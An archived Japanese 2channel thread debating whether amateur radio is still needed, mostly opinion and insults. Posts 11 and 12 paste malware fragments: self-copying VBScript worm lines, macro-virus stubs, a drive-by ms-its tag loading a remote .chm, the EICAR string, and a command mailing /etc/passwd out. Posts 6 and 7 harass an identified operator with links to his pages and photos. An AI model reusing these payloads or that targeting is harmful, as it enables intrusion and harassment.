2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

アマチュア無線は不要なのか?

1 :名無しさんから2ch各局…:2006/12/14(木) 14:23:11
アマチュア無線は不要なのか?
http://blog.goo.ne.jp/ikedanobuo/e/a3648c5745986bf6b6dd835dd635f5f6

池田君も不要だと思うんだが
議論ドゾー


2 :名無しさんから2ch各局…:2006/12/14(木) 14:25:06
必要だ、と言い切れば完了なので誰か一発ドゾー。

3 :名無しさんから2ch各局…:2006/12/14(木) 14:25:34
スレタイのチョイスが悪い
これでは池田を利してしまう
てかそれがそれが目的か?

sage

4 :名無しさんから2ch各局…:2006/12/14(木) 14:31:44
必要無い。

5 :名無しさんから2ch各局…:2006/12/14(木) 14:32:49
信夫君、乙(藁)

6 :意毛駄君不要:2006/12/14(木) 14:39:44
P5のDXerだぁのお部屋

http://0bbs.jp/je1syn/

祖国の土を踏まぬ間に1972年3月から35年の歳月が経っていました。保存しておきたい将軍様の画像や資料などをこちらに掲載して参ります。
画像等について共和国の所有権を宣言致します、勝手に転載を禁止致しますが、ご利用の場合はメール等で焼き場まで連絡下さい。SYNOP。

http://www.k2.dion.ne.jp/~t_ikeda/
http://blogs.dion.ne.jp/dxer/
http://page.freett.com/nickyama2/maebashi021.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00791.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00991.jpg
http://www001.upp.so-net.ne.jp/takahashi/photo/je1syn102.JPG
http://dxxxxx.hp.infoseek.co.jp/img040821/P10105971.jpg
http://tgc.jp-au.net/member.htm
http://543.teacup.com/tgc/bbs
http://www.maeko-hs.gsn.ed.jp/

7 :名無しさんから2ch各局…:2006/12/14(木) 14:43:50
97年9月から稼働し始めた当方自慢のホームページですが、ちょうど今年で満5年を迎え又
アクセスカウントも20万を超しアイピーを晒してK県に宣戦布告したという事を節目にバツが悪
いためにホームページを休止し致します。思えば5年前にホームページを立ち上げたときは、この
ように2ちゃんねるとアマチュア無線の融合が爆発的に流行るとは思えずダイヤルアップ接続に
特化した内容のモノも少なく、手探りで勤務中に会社から50Wの移動局を主な誹謗中傷の対
象としてカキコして参りました。この5年間続けられていたのもひとえに私をハケーンしに飲み会に来て
頂いたり無線板にネズラネタをカキコ頂いた方々のお陰と感謝の念で一杯です。職場での左遷や
愛犬の食費問題など公私共、今後さらなる金欠病が予測され、ダイヤルアップ接続料に費やす
資金が取れなくなるというのも休止の大きな原因です。夢であったP5の首領殿とアイボールも出来、
後はサダムフセイン残しということで、パケクラに個人コールでレポートする気力が衰えたのも事実で
すが・・・?!今ではトカチさんをはじめとする多くのDXER諸氏が常時接続回線を用いて個人ホー
ムページを立ち上げられて居られますし著名アイボールQSOクラブでも稼働させているところが多く
有ります。是非ともこういったホームページをご利用され、ご自身のカキコ向上に役立てられてください!
なお、当ホームページへのリンク張られていた方々、申し訳ないのですが削除を御願い致します。この
告知のページも経済的な理由により1ヶ月程度をメドに停止致します。本当に5年間当方自慢の
ホームページをご利用頂き、ありがとうございました。

http://0bbs.jp/je1syn/
http://blogs.dion.ne.jp/dxer/
http://www.k2.dion.ne.jp/~t_ikeda/
http://page.freett.com/nickyama2/maebashi021.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00791.jpg
http://zumatsu.hp.infoseek.co.jp/2005Hamfair/IMGP00991.jpg
http://www001.upp.so-net.ne.jp/takahashi/photo/je1syn102.JPG
http://dxxxxx.hp.infoseek.co.jp/img040821/P10105971.jpg
http://tgc.jp-au.net/member.htm
http://543.teacup.com/tgc/bbs
http://www.maeko-hs.gsn.ed.jp/


8 :名無しさんから2ch各局…:2006/12/14(木) 14:47:35
まあ、一般庶民にしてみれば電波公害を撒き散らしわけのわからない
奇声を時々発する近所の変人というのがアマチュア無線家に対する
見方でしょうからいらないという人のほうが普通でしょう。

9 :名無しさんから2ch各局…:2006/12/14(木) 15:15:55
http://paipanhoukeim.blog70.fc2.com/blog-entry-108.html

10 :名無しさんから2ch各局…:2006/12/14(木) 15:27:54
http://d.hatena.ne.jp/firewitch/20061210/p2

11 :名無しさんから2ch各局…:2006/12/14(木) 16:04:48
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.Copy^^^^File f1.path, f1.path+"l"
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

12 :名無しさんから2ch各局…:2006/12/14(木) 16:15:48
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

13 :名無しさんから2ch各局…:2006/12/15(金) 00:43:20
その前にアマチュア無線は有用なのか?と問いたい。


14 :名無しさんから2ch各局:2006/12/15(金) 08:21:30
漏れの唯一の趣味に有用、無用の論議は止めてくれ。これが無ければ他に
する事がなくて、泣けてくる。

15 :名無しさんから2ch各局…:2006/12/15(金) 08:25:13
http://money4.2ch.net/eco/index.html#1

16 :名無しさんから2ch各局…:2006/12/15(金) 08:52:17
必要だという意見がまだ一つも出て来ないところを見ると完全に不要ということに決定ですね。
百害あって一利無しのアマチュア無線を廃止させる運動を推進させましょう。


17 :名無しさんから2ch各局…:2006/12/15(金) 08:57:35
>>14
他の趣味を探せ

アマ無線は、趣味だからな、生活には、必用無し!

ただし災害時は、必用だな!


18 :名無しさんから2ch各局…:2006/12/15(金) 09:00:46
あほらしくて誰も見ないだけだと思うが。

19 :名無しさんから2ch各局…:2006/12/15(金) 09:11:48
必用なんて、普通に変換していれば出るはずない誤用じゃないか?
三国人の工作カキコなら、乙という言葉を贈ろう。また、れっきとした
日本人というなら「ひつ」「よう」なんて分けて変換してないで、お近くの
パソ教室に行くか会社の部下に頭を下げて入力の基本から教えてもらえ。

20 :名無しさんから2ch各局…:2006/12/15(金) 09:22:30
世の中は少数派ほど吠えるのが定説だからな。多数派の考え方として、そんな遠吠えで物事が
ゆるぐはずがないという安心感があったり、少数派のガイキチじみた理論は取るに足らないと
考えるものだからあえて同じ土俵に上がらず静観の構えを見せる。
まぁ言論の自由という物もあるから、好きなだけブチ上げていてくれ。
君がいつの日か総務省代表団の一員としてスイスに赴き、国際電気通信連合の会議でアマ不要論を
展開してくれるのを待ってるよ。

21 :名無しさんから2ch各局:2006/12/15(金) 09:23:18
ひつように重箱の隅をほじる人ハケーン。

22 :名無しさんから2ch各局…:2006/12/15(金) 09:39:50
まあ、やぶへびになってアマチュア無線廃止という道にならないよう
に願ってますよ。

23 :名無しさんから2ch各局…:2006/12/15(金) 23:46:51
このネット社会で無線が必要か?傍受されまくりだろ・・・
電信が無くしたついでに無線自体をなくせばよかったのに・・・

おまけ
http://www.youtube.com/watch?v=6ZUuSJnkjIk


24 :名無しさんから2ch各局…:2006/12/16(土) 02:09:30
この車社会で鉄道が必要か?決まった所しか走れないんだろ。
蒸気機関車を無くしたついでに鉄道自体を廃止したらよかったのに。
と同じくらい暴論だな。

25 :名無しさんから2ch各局…:2006/12/16(土) 02:11:11
>>21
ひつように→しつように
重箱の隅はほじるのではなく、つついて下さい。

26 :名無しさんから2ch各局…:2006/12/16(土) 02:28:15
38年前、山岳遭難救助で中学1年の漏れは大人に混じり徹夜で参加
北海道のその又ど田舎なもんで尼免は町に二人
FDAM-3からの電波を追って翌朝無事に救助
それ以来海女無線での一般社会への貢献は無いんだよな


27 :名無しさんから2ch各局…:2006/12/16(土) 02:44:52
色んなバカが見れてこのスレ楽しいね。

28 :名無しさんから2ch各局…:2006/12/16(土) 02:51:40
>>26
そもそも趣味如きで社会貢献しているモノって少ないだろ?

29 :名無しさんから2ch各局…:2006/12/16(土) 08:38:19
趣味に必要も不要もあるか。それ自体が楽しいからやる。それだけだろ。
ただ、アマ無線の場合は、多くの若人を理系に進ませたという
国家からみて都合の良い作用もあったわけだがね。
理系は搾取される側という認識が広まり、理系が敬遠されはじめたことと、
アマ無線の衰退には関係がありそうだな。

30 :名無しさんから2ch各局…:2006/12/16(土) 13:29:56
私が入門するきっかけになった本には「アマの制度に広く門戸が開かれている事は、普通なら
電子工学や法令といった物に縁遠い層が勉強して知識をつけるきっかけとなり、国の学識レベルを
底上げする事にもつながるのである」とあった。
私はたまたま職業につなげる事ができたが、理系の道に入るとか研究者になるとまでいかなくとも
日常生活の中でこういう知識があるのとないのではかなり違うことだろう(テレビの電波は風で
流れるなどと平気で子供に教えたり)
ハムの衰退は突き詰めれば「ややこしい事は極力避けたい」「何で好きこのんで勉強なんか」と
いう日本人の考え方の変化による所が大きいと思う。総白痴化に到る経緯は様々な事柄が複合的に
あると思うが、テレビ番組にしても教養や見聞の深まる内容が減って、芸のない「芸人」が内輪ウケ
してるばかりになった。お笑い番組を例にとっても、昔は話芸というしっかりしたポリシーを
出演者から感じる事ができた。
今時は新聞やニュース番組のテロップにさえ誤植や語彙の誤用が乱発され、いよいよ思考力低下は
深刻だと感じる。

31 :名無しさんから2ch各局…:2006/12/16(土) 13:45:46
ハムの人口減少には関係団体が危機感を覚えて回復にやっきになっているようだが、事情はそう
簡単ではないように思う。何もハムがつまらなくなったという訳でなく(実際、楽しみ方の基本は
昔からずっと変わってない。逆に使えるモードなどは増えている)その楽しみ方にロマンを感じたり
楽しいと思えなくなっているのである。例えばインターネットで外国とすぐコンタクトできるから
無線なんて、と言うように。聡明な諸氏なら「車があるから自転車いらない」とは言えないと例えれば
ご納得いただけるであろう。
このように、ハム人口の減少は日本の知識レベルのバロメーターと言っても過言ではなく、
気の毒な話だが一趣味団体の努力ではどうにもならない事だと考える。逆に国や文部当局が早く
この事実を深刻にとらえ、ゆとりだ愛国心だ学校評価だと議論する前に教育の本質的な部分を
考えて頂きたいものである。放置すればいずれ日本は「ものづくり」が崩壊し、フィリピンの如く
サービス業要員の輸出がトップ産業になってしまうのではないか。
放送はどうして聞こえるのかな?というような素朴な疑問に子供が気を留め、それに答えられる大人がいる。そういう国に戻る事を期待したい。

32 :名無しさんから2ch各局…:2006/12/16(土) 13:50:21
さすればハム人口もかつての勢いを取り戻し、日本の上空にはかつてそうだったように
日に夜に技術的な会話を楽しむアカデミック・ハムの電波が飛び交う事であろう。

東新日報17日朝刊社説

33 :名無しさんから2ch各局…:2006/12/16(土) 14:21:45
必死だな

34 :名無しさんから2ch各局…:2006/12/16(土) 14:24:51
いらない
ハムレベルでは女子高校生の電子レベルにも劣る

35 :名無しさんから2ch各局…:2007/01/10(水) 23:15:41
鉄塔やらが倒れれ災害を引き起こしそうなので、どちらかといえば
ハムはない方がいいと思う。
でも、老人が昔の技術にノスタルジックに浸れるよう、
残しておいてもいいと思う。

36 :名無しさんから2ch各局…:2007/01/11(木) 11:44:51
>>32
「さすれば」って言うからには、前提となることがらが有ったはずだが、
どういうことだったの?

37 :名無しさんから2ch各局…:2007/01/11(木) 11:51:59
>>36
>>30>>31

38 :名無しさんから2ch各局:2007/01/11(木) 12:22:21
アマチュア無線は趣味ダゾ
遊びなんだぞ!
「人が楽しんで遊んでんのにケチつけられる云われはねえ」
って言われて住所とかTEL調べられてイヤガラセされるよ

39 :名無しさんから2ch各局…:2007/01/11(木) 12:46:14
要らない。

40 :名無しさんから2ch各局:2007/01/11(木) 14:04:41
てめ−らも創価学会か。

41 :名無しさんから2ch各局…:2007/01/11(木) 14:10:52
無線板を見たら一目瞭然。
こんな連中の趣味なんか消滅願いたい。
PLC絶対賛成だな(おまけ)

42 :名無しさんから2ch各局:2007/01/11(木) 14:16:55
てめえらバカだな
アマ無線なんか人間のクズどもの趣味なんだからな
無線してるところナンカ見たら
とんかちで殴りたくなるよ

43 :名無しさんから2ch各局…:2007/01/11(木) 14:47:12
殴れよwDQNがw

44 :名無しさんから2ch各局…:2007/01/11(木) 14:52:23
10年ぐらいを暫定期間として廃止したらどうでしょう。
(再免許を行わない)

45 :名無しさんから2ch各局…:2007/01/11(木) 23:39:27
>>44
放って置いてもこの先10年ぐらいで順番にこの世から消えて逝くw

46 :名無しさんから2ch各局…:2007/01/13(土) 00:21:16
廃止されたらいやだな。
こんな連中が、街に出てくるかと思うと。

47 :名無しさんから2ch各局…:2007/01/14(日) 21:27:45
何かの薬といっしょで、中毒者には不可欠かもしれないが、
それ以外の人にとっては、廃絶すべきもの。
長くかかわっている人は、過去と現実の区別がつかなくなってる。


48 :名無しさんから2ch各局…:2007/01/14(日) 23:36:24
お隣のタワーが目障りでつ。。町内会の圧力で撤去させました。

49 :オーバーパワーは不要?:2007/01/14(日) 23:48:00
http://www.roar-j.jp/
日本ロータリーハムクラブHP

http://www.roar-j.jp/riji/index.html
DKAは無線局運営委員長(役員)

http://www.tele.soumu.go.jp/menkyo/SearchServlet?IT=A&HZ=3&OX=AT+&MA=JF1DKA&OW=AT+0&DC=10&pageID=3&DF=0001444166&styleNumber=50
4アマキロワッターのDKA

CQ誌2002年1月号のドクター(DKA)の取材記事で
ドクターが2000Fと一緒に写っていてた。総通晒を見ると4アマ
オーバーパワー疑惑が持ちあがった
疑惑は、ヅラや学歴、鑑定結果にも及ぶことがわかった

2006年6月12日の日本ロータリーハムクラブ電波定例のキー局はDKA
(平日7:30-8:15 7.077.5MHz LSB で行われいる)
2週間ぐらい前からネットで「6/12に4アマ`ワッターが出るぞ」と
ボコボコに叩かれたのに関わらず、当日堂々と出てきた
4アマなのに100w局よりも波が強かった
これでオーバーパワーが確定した

612のことでボコボコに叩かれたことが原因か、
その後キー局でDKAが当たることはなくなった

4アマ`ワッターが無線局運営委員長を務める日本ロータリーハムクラブはさっさと解散しろ!
日本音響研究所はなくなれ!

50 :名無しさんから2ch各局…:2007/01/15(月) 20:05:54
移動運用やっている奴を見た一般人カップルの会話
「あの人こんなところで無線やってるけどなんか事件でも起きたの?」
「いやあれはアマチュア無線だから何の意味も無いんだよ」
プッ

51 :名無しさんから2ch各局…:2007/01/16(火) 02:11:49
無線で不特定多数の見知らぬ人に「誰かいませんか〜?」と言うのは良くて
携帯で見知らぬ暇人を探すのは白い目で見られるんですか?

52 :名無しさんから2ch各局…:2007/01/16(火) 17:25:07
山や海での遭難時や、電話の通じにくい大規模災害時には有用な通信手段となるので、必要。

53 :名無しさんから2ch各局…:2007/01/16(火) 17:34:16
>>51
無線のほうは不特定多数とはいえない。
免許所持者で同じ趣味の人ばかりだから。

不法局はしらん。携帯は完璧に不特定多数だろ。

54 :名無しさんから2ch各局…:2007/02/17(土) 00:07:06
>>52
電話の普及前の60年代や、携帯の普及前の80年代の発想だよ。
命がけの登山なら衛星携帯をレンタルするし、海なら防水携帯で海保に118だ。
遭難したときには、誰か知らん、聞いているかもわからんアマチュア相手と話すより、海保や警察と話をしたいと思うよ。
大規模災害だって、ご近所のアマチュアも被災者だろうし。
まあ、ないよりはあった方がいいという程度のもので、「必要」なんて言えるほどのもんじゃない。

55 :a奈奈BSD:2007/02/17(土) 00:08:08
◆◆◆◆◆GE OVER POWER 万年煮海女痔自慰◆◆◆◆◆

56 :名無しさんから2ch各局…:2007/02/17(土) 00:35:17
衛生電話だって通信規制かかんだぞ

57 :名無しさんから2ch各局…:2007/04/03(火) 18:15:27
衛星電話も今は色々あってね、本当に通信規制が心配なら
別な衛星会社の衛星電話を持ってけばいいだけ。そもそも、
非常時に、聞いてるかどうかわからない相手に
助けをもとめるより、現実的だと思うよ。

58 :名無しさんから2ch各局…:2007/04/04(水) 05:08:21
>>52
通信手段にはなっても通信する相手がいないので無意味

59 :名無しさんから2ch各局…:2007/06/01(金) 13:09:45
ロングパスで、あそべ

60 :名無しさんから2ch各局…:2007/07/01(日) 22:47:14
エッチすると彼女が痛がってしまい、
途中でエッチを止める日が半年以上続いています。


61 :名無しさんから2ch各局…:2007/07/02(月) 13:55:55
廃止大賛成!!
ttp://blog.goo.ne.jp/ikedanobuo/e/a3648c5745986bf6b6dd835dd635f5f6

62 :JQ2VGE:2007/07/02(月) 15:46:39
必要だ!!!!!

63 :名無しさんから2ch各局…:2007/07/02(月) 15:47:45
必要だ!!!!!

64 :名無しさんから2ch各局:2007/07/02(月) 16:11:05
僕ちゃんにとっては必要だ。お宅の私はこれ以外に趣味なし、彼女なし。

65 :名無しさんから2ch各局…:2007/07/02(月) 16:41:23
>>64
ちんちんシュシュシュしてろ

66 :名無しさんから2ch各局…:2007/07/02(月) 22:26:32
アマチュア無線(゚听)イラネ
携帯とスカイプで十分

67 :名無しさんから2ch各局…:2007/07/02(月) 22:51:22
アマチュア無線は不要なのか?

今の若者に聞かせられん内容が殆ど

もぅ不要なのかなぁ〜

68 :名無しさんから2ch各局…:2007/07/06(金) 12:07:03
まじめなMLをCQ誌で紹介してはどうですか。yamaとか。

69 :名無しさんから2ch各局…:2007/07/06(金) 14:36:57
緊急無線以外は不要

70 :名無しさんから2ch各局…:2007/08/03(金) 17:57:50
第一、アマチュア無線は必要か、必要ないか、そういう問題ではないと思う。
あくまでも趣味なのだから。

71 :名無しさんから2ch各局…:2007/08/18(土) 06:56:25
悪魔でも???

72 :名無しさんから2ch各局…:2007/08/20(月) 20:47:17
ロト6のCMででてくる、3にんの女で
左のめがね萌えねーちゃんの、表情、しらじらしくて、イイ

73 :信長:2007/08/20(月) 20:57:12
67 弱腰になるな!
70 座布団一枚ww
72 氏ね

まぁ これは趣味ですからなww
いるとかいらないとかは関係ないよ。
でもHFとかを全く昔使えなかった周波数開拓したのはアマチュア無線家らしいしな。
あった方がいいんじゃね。

74 :名無しさんから2ch各局…:2007/08/21(火) 12:02:30
>>73
>でもHFとかを全く昔使えなかった周波数開拓したのはアマチュア無線家らしいしな。
というより当時全く飛ばないと思われていた短波帯に追いやられたら、それが飛んだってだけで、アマチュアが無くても誰かしら発見していただろうよ。

75 :名無しさんから2ch各局…:2007/08/21(火) 12:37:13
まだアマチュア無線家などという名もついてない電波キDガイが、国家を問わず
あちこち散らばってめいめいで実験してたからこそ、短波の飛びが早々に解明された。
一対向の伝搬ルートを設定したような形で学者が実験したとして、なかなか実証
までたどり着かなかったろう。そりゃいずれは誰かが解明できただろうとは思うが。

76 :名無しさんから2ch各局…:2007/08/21(火) 13:17:53
実験ならばその実験結果を発表すればいいのだが、あまり聞かないな。
つまり実験と言うより、当時の金持ちのお遊びだな。


77 :名無しさんから2ch各局… :2007/08/21(火) 15:51:10
>>75の言ってる時代にはいっぱいでてたよ。もっとも連中は今で言えばアンカバー局になるが。

78 :信長:2007/08/21(火) 17:06:12
》77
そのアンカバー局はまだ開拓されてない275GHz(ギガヘルツ)より上へ行けばいいのか。


79 :名無しさんから2ch各局…:2007/08/21(火) 17:07:32
赤外線1kW

80 :名無しさんから2ch各局…:2007/08/21(火) 17:14:43
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 || ○荒らしは放置が一番キライ。荒らしは常に誰かの反応を待っています。
 || ○重複スレには誘導リンクを貼って放置。ウザイと思ったらそのまま放置。
 || ○放置された荒らしは煽りや自作自演であなたのレスを誘います。
 ||  ノセられてレスしたらその時点であなたの負け。
 || ○反撃は荒らしの滋養にして栄養であり最も喜ぶことです。荒らしにエサを
 ||  与えないで下さい。                  Λ_Λ
 || ○枯死するまで孤独に暴れさせておいて   \ (゚ー゚*) キホン。
 ||  ゴミが溜まったら削除が一番です。       ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ

81 :名無しさんから2ch各局…:2007/08/21(火) 18:27:28
>>77
ということは、アマチュア無線家が短波の伝播を発見したのではなく、
アンカバーが発見したんじゃねぇかよ。
よくハムの先輩方が・・・っていうが、これは間違えであり、
無免許のトラッカーの先輩方が発見したってわけか?

82 :信長:2007/08/22(水) 02:39:21
》81 当時 免許制じゃなかったから アマチュア無線家もアンカバーもないね♪
ただ当時無線を研究していた奴が=アマチュア無線家が見つけた。それだけ。

83 :名無しさんから2ch各局… :2007/08/22(水) 13:28:35
まあ、>>82の言うとおりだ。無線が使用され始めたのは10〜20年前の話じゃないんだよ。

84 :信長:2007/08/22(水) 20:04:11
安土桃山時代からからな

85 :名無しさんから2ch各局…:2007/08/22(水) 20:23:11
典型的「現在のものさしで歴史を見るアホ」の例だなw

86 :信長:2007/08/26(日) 16:42:53
>>82 人の名前を勝手に使うな
マナーの分からんやつは書き込むな

87 :名無しさんから2ch各局…:2007/08/26(日) 22:31:30
>>84 おまえもだ
おまえがイチバンいかんぞ

88 :名無しさんから2ch各局…:2007/08/26(日) 23:53:17
不要だろ?
画期的な変調方式を開発するわけでもなく、
ただ、くだらない世話話を延々してるだけなんだから。
もはやここまで携帯やインターネットが普及してるんだからそっちで存分に世話話しろよ。
くだらないことで限りある帯域を食いつぶすな。


89 :信長:2007/08/27(月) 02:07:17
>>87
それは435とかのあたりの話だろww
HFなんかではそんなことしてないよ。
なんたって無線には携帯やネットと違って
交信できるかできないかでハラハラするよ
>>87めHFやってみろよ。
第一 ケータイやネットは金がかかる
俺も友達とメールしたりモバゲーしたりこうやって2chしたりして毎月8000円は行く(泣)
ネットもにたようなもんだ
だが無線は毎年税金500円だぞw
アマチュア無線を批判するなら
実際にやってから批判しろよ。
それが道だぞ。
ちなみに俺は>>82

90 :信長:2007/08/27(月) 02:12:22
ゴメン
>>87じゃなくて>>88だ。

91 :名無しさんから2ch各局…:2007/08/27(月) 02:30:34
タリバンなんかはアマ無線機で暗号使用の場合と秘話装置使用ですよ(マジ
世界各地のゲリラも日本製アマ無線機や、中国台湾製無線機や長距離無線電話装置を
よく使っています。(SENAO製の、いわゆるハイパワーコードレス電話を外線に接続せず、インターホンとしての使用が多い。)   
パッキンを換えるだけで、MIL規格を簡単にクリアできる
ほどの基本性能を持つのが、日本のアマチュア無線機なんですよ。
誇らしいことであるかも知れないけど、本来のユーザーが
減少しているのが、痛いかもな。


92 :信長:2007/08/27(月) 02:42:09
>>91 それは悲しいことです(;o;)

93 :名無しさんから2ch各局…:2007/09/01(土) 18:21:26
不要ではない。

94 :名無しさんから2ch各局…:2007/09/02(日) 16:49:50
不要ではない

95 :名無しさんから2ch各局…:2007/09/02(日) 16:58:43
不要。
VHFは特に逼迫してるんだ。
馬鹿話ひとつに40KHzなんて貴重な帯域使うな。



96 :名無しさんから2ch各局…:2007/09/02(日) 17:01:00
不要の要

97 :名無しさんから2ch各局…:2007/09/02(日) 17:03:02

http://tgc.jp-au.net/rollcall-summary2007.html

98 :名無しさんから2ch各局…:2007/09/02(日) 17:07:21
>>95
無線は馬鹿ではない。
何も知らないくせに。


99 :名無しさんから2ch各局…:2007/09/02(日) 17:17:02
>>98
世の中の役に立ってないのは分かってる。
馬鹿話したければインターネットでVOIPかケータイにしろよ。
電波は貴重な資源だ。

100 :名無しさんから2ch各局…:2007/09/02(日) 17:17:52
そうだそうだ!
>>98のいうとおり。
第一VHFは地デジでTVが使わなくなるから、これから空くんだ!

101 :名無しさんから2ch各局…:2007/09/02(日) 17:19:38
100GET

102 :名無しさんから2ch各局…:2007/09/02(日) 17:22:39
>>100
空かねーよ。
その帯域と尼無線の帯域は他の公共通信と無線タグに割り当てるのが一番。
馬鹿話のためにくれてやる帯域なんて1KHzすらねーんだよ。


103 :名無しさんから2ch各局…:2007/09/02(日) 17:23:51
>>99は無線でやるからいいということがわかってない。
第一に馬鹿話(世間話のことですか。)など全くしていないぞ
実際にやってから文句を言え!
FMとSSB両方聞け!

104 :名無しさんから2ch各局…:2007/09/02(日) 17:27:48
>>102 実際に無線をやってから文句言えよ。
お前みたいなキモ童貞早くタヒね

105 :名無しさんから2ch各局…:2007/09/02(日) 17:30:04
>>103
聞く必要すらねーよ。
昔に秋葉原の無線機屋で尼無線聞いたことあるけど
しょーもない馬鹿話しか聞こえなかったぞ。
SSBという事は確か3KHzか?
それすらもったいねー


106 :名無しさんから2ch各局…:2007/09/02(日) 17:32:36
>>104のいうとおり。
>>102早く出てこいや。
自分の都合が悪くなったからってsageてるんじゃねーよ。
それじゃガキと同じだな。

107 :名無しさんから2ch各局…:2007/09/02(日) 17:35:23
>>105
どうせ 平日の昼間とかにきいたんだろ?
ニート君。


108 :名無しさんから2ch各局…:2007/09/02(日) 17:37:49
反論なら尼無線が実際どういう風に社会に役立ってるのか素人にも分かるように説明しろよ。
事実電波の有効利用なんてこれっぽっちもやってないだろ?
ガキとか童貞とか書き散らすのが反論か?
所詮尼無線家だからな。 子供かと思ったよ。
子供の遊びに電波の割り当てなんていらないだろ。

109 :名無しさんから2ch各局…:2007/09/02(日) 17:39:55
>>俺実際にガキですから。

110 :名無しさんから2ch各局…:2007/09/02(日) 17:48:36
不要ではない。

111 :名無しさんから2ch各局…:2007/09/02(日) 17:49:37
不要ではない。

112 :名無しさんから2ch各局…:2007/09/02(日) 17:50:14
不要ではない

113 :名無しさんから2ch各局…:2007/09/02(日) 17:51:07
不要ではない

114 :名無しさんから2ch各局…:2007/09/02(日) 17:53:02
不要としか言いようが無い。

115 :名無しさんから2ch各局…:2007/09/02(日) 17:55:29
↓必要です
http://tgc.jp-au.net/rollcall-summary2007.html


116 :名無しさんから2ch各局…:2007/09/02(日) 18:06:35
>>115
見てみたけど、社会の役に立ってなさそうなので不要。

117 :名無しさんから2ch各局…:2007/09/02(日) 18:06:43
>>115はタヒね。
>>114は何ですぐsageるのか全くわからんな。

何も知らずに不要とか言うな。

118 :名無しさんから2ch各局…:2007/09/02(日) 18:15:02
>>117
不要の根拠
馬鹿話のために貴重な電波が使われている。
特にVHFみたいに使いやすい周波数が社会の役に全く立ってない。



別にsageても良いだろ?
ageるといい事あるのか?


119 :名無しさんから2ch各局…:2007/09/02(日) 18:21:39
>>118馬鹿話馬鹿話馬鹿話ってうるせぇなぁ〜。
コンテストの時も聞いてみろよ!
第一今年は例年程コンディションが良くない図書館なんだよ!
毎月CQ誌読んでるのか!

120 :名無しさんから2ch各局…:2007/09/02(日) 18:27:12
>>119
CQ誌ってCQ出版が出してる本か?
CQ出版の雑誌はトラ技とデザインウェーブしか読まねーよ。
コンテスト?何それ?
それは社会に役に立つのか?


121 :名無しさんから2ch各局…:2007/09/02(日) 18:30:45
>>120
じゃあアマチュア無線と同じ趣味のラジコンとかサバゲとかゲームは役にたつのか!?

122 :名無しさんから2ch各局…:2007/09/02(日) 18:41:54
>>121
ラジコンの周波数帯域なんてほんの少しだけだろ?
しかも出力は微弱だ。
あと農薬散布用ラジコンとかもあるから必要だ。

サバゲーに電波使うか?

123 :名無しさんから2ch各局…:2007/09/02(日) 19:02:18
日本国内でアマ無線が廃止だの不要だのブツブツ言っててもどうにもならんよ、
そういう人は国連?にでも訴えてください、アマチュア無線は日本の国技ではなくて国際的なものだからね。
まあこのまま衰退していくなら日本人は金儲けしかできないと思われてもしかたないかもね。




124 :名無しさんから2ch各局…:2007/09/02(日) 19:54:50
不要ではない

125 :名無しさんから2ch各局…:2007/09/02(日) 19:56:29
オナニーは必要

